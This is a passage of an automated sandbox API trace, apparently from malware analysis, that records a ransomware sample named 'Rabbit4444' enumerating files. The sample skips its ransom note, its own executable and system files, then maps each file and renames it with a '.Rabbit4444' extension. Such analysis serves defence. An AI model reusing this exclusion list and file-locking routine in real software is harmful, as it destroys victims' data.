hHeap=0xe0000) returned 1 [0059.591] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0059.591] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15090170375) returned 1 [0059.591] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0059.591] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0059.591] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.591] CloseHandle (hObject=0x298) returned 1 [0059.591] CloseHandle (hObject=0x278) returned 1 [0059.591] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms.Rabbit4444") returned 192 [0059.591] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{e07f215a-6022-40e0-a109-17078992e5f9}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{e07f215a-6022-40e0-a109-17078992e5f9}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.592] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ba0bec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x56ba0bec, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x230eb5fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms", cAlternateFileName="CL2EEB~1.SET")) returned 1 [0059.592] lstrcmpiW (lpString1="Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.592] lstrcmpiW (lpString1="Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.592] lstrcmpiW (lpString1="Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.592] lstrcmpiW (lpString1="Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms", lpString2=".") returned 1 [0059.592] lstrcmpiW (lpString1="Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms", lpString2="..") returned 1 [0059.592] lstrcmpiW (lpString1="Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms", lpString2="windows") returned -1 [0059.592] lstrcmpiW (lpString1="Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.592] lstrcmpiW (lpString1="Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.592] lstrcmpiW (lpString1="Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms", lpString2="boot") returned 1 [0059.592] lstrcmpiW (lpString1="Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.592] lstrcmpiW (lpString1="Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.593] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms" | out: lpString1="Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms") returned="Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms" [0059.593] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.593] lstrlenW (lpString="Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms") returned 64 [0059.593] lstrlenW (lpString="Rabbit4444") returned 10 [0059.593] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.593] lstrlenW (lpString=".dll") returned 4 [0059.593] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.593] lstrlenW (lpString=".lnk") returned 4 [0059.593] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.593] lstrlenW (lpString=".ini") returned 4 [0059.593] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.593] lstrlenW (lpString=".sys") returned 4 [0059.593] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.593] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{e2394c16-f45a-496f-83cc-49e163281662}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.594] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.594] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15090435695) returned 1 [0059.594] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=937) returned 1 [0059.594] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0059.594] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0059.594] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6b0, lpName=0x0) returned 0x298 [0059.595] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b0) returned 0x70000 [0059.596] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.596] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0059.596] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.596] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.596] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.596] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.596] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0059.596] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15090689410) returned 1 [0059.596] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0059.596] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0059.596] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.596] CloseHandle (hObject=0x298) returned 1 [0059.596] CloseHandle (hObject=0x278) returned 1 [0059.596] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms.Rabbit4444") returned 192 [0059.597] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{e2394c16-f45a-496f-83cc-49e163281662}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E2394C16-F45A-496F-83CC-49E163281662}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{e2394c16-f45a-496f-83cc-49e163281662}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.597] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56c39557, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x56c39557, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23242b2c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x344, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms", cAlternateFileName="CLCBC2~2.SET")) returned 1 [0059.597] lstrcmpiW (lpString1="Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.597] lstrcmpiW (lpString1="Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.598] lstrcmpiW (lpString1="Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.598] lstrcmpiW (lpString1="Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms", lpString2=".") returned 1 [0059.598] lstrcmpiW (lpString1="Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms", lpString2="..") returned 1 [0059.598] lstrcmpiW (lpString1="Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms", lpString2="windows") returned -1 [0059.598] lstrcmpiW (lpString1="Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.598] lstrcmpiW (lpString1="Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.598] lstrcmpiW (lpString1="Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms", lpString2="boot") returned 1 [0059.598] lstrcmpiW (lpString1="Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.598] lstrcmpiW (lpString1="Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.598] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms" | out: lpString1="Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms") returned="Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms" [0059.598] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.598] lstrlenW (lpString="Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms") returned 64 [0059.598] lstrlenW (lpString="Rabbit4444") returned 10 [0059.598] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.598] lstrlenW (lpString=".dll") returned 4 [0059.598] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.598] lstrlenW (lpString=".lnk") returned 4 [0059.598] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.598] lstrlenW (lpString=".ini") returned 4 [0059.598] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.598] lstrlenW (lpString=".sys") returned 4 [0059.598] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.598] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.599] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.599] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15090943332) returned 1 [0059.599] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=836) returned 1 [0059.599] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0059.599] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0059.599] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x650, lpName=0x0) returned 0x298 [0059.600] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x650) returned 0x70000 [0059.601] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.601] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.601] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.601] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.601] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15091205972) returned 1 [0059.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0059.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0059.601] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.602] CloseHandle (hObject=0x298) returned 1 [0059.602] CloseHandle (hObject=0x278) returned 1 [0059.602] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms.Rabbit4444") returned 192 [0059.602] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{e2e7934b-dce5-43c4-9576-7fe4f75e7480}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.603] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56d90a7a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x56d90a7a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2216c19d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x390, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms", cAlternateFileName="CL882C~1.SET")) returned 1 [0059.603] lstrcmpiW (lpString1="Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.603] lstrcmpiW (lpString1="Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.603] lstrcmpiW (lpString1="Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.603] lstrcmpiW (lpString1="Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms", lpString2=".") returned 1 [0059.603] lstrcmpiW (lpString1="Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms", lpString2="..") returned 1 [0059.603] lstrcmpiW (lpString1="Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms", lpString2="windows") returned -1 [0059.603] lstrcmpiW (lpString1="Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.603] lstrcmpiW (lpString1="Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.603] lstrcmpiW (lpString1="Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms", lpString2="boot") returned 1 [0059.603] lstrcmpiW (lpString1="Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.603] lstrcmpiW (lpString1="Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.603] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms" | out: lpString1="Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms") returned="Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms" [0059.603] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.603] lstrlenW (lpString="Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms") returned 64 [0059.603] lstrlenW (lpString="Rabbit4444") returned 10 [0059.603] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.603] lstrlenW (lpString=".dll") returned 4 [0059.603] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.603] lstrlenW (lpString=".lnk") returned 4 [0059.603] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.603] lstrlenW (lpString=".ini") returned 4 [0059.603] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.603] lstrlenW (lpString=".sys") returned 4 [0059.603] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.603] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{e4b554c8-b067-4540-a478-0565bb1f76b9}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.604] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.604] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15091455352) returned 1 [0059.604] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=912) returned 1 [0059.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0059.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0059.604] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x690, lpName=0x0) returned 0x298 [0059.613] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x690) returned 0x70000 [0059.614] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.614] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.614] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.614] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0059.614] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.614] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0059.614] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.614] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.614] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15092494934) returned 1 [0059.614] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0059.614] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0059.614] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.614] CloseHandle (hObject=0x298) returned 1 [0059.614] CloseHandle (hObject=0x278) returned 1 [0059.615] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms.Rabbit4444") returned 192 [0059.615] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{e4b554c8-b067-4540-a478-0565bb1f76b9}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E4B554C8-B067-4540-A478-0565BB1F76B9}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{e4b554c8-b067-4540-a478-0565bb1f76b9}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.615] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e293ca, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x56e293ca, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x230c53a3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x435, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms", cAlternateFileName="CL7EF1~1.SET")) returned 1 [0059.618] lstrcmpiW (lpString1="Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.618] lstrcmpiW (lpString1="Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.618] lstrcmpiW (lpString1="Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.618] lstrcmpiW (lpString1="Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms", lpString2=".") returned 1 [0059.618] lstrcmpiW (lpString1="Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms", lpString2="..") returned 1 [0059.618] lstrcmpiW (lpString1="Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms", lpString2="windows") returned -1 [0059.618] lstrcmpiW (lpString1="Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.618] lstrcmpiW (lpString1="Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.618] lstrcmpiW (lpString1="Classic_{e9950154-c418-419e-a90a-20c5287ae24b}.settingcontent-ms", lpString2="boot") returned 1 [0059.618] lstrcmpiW 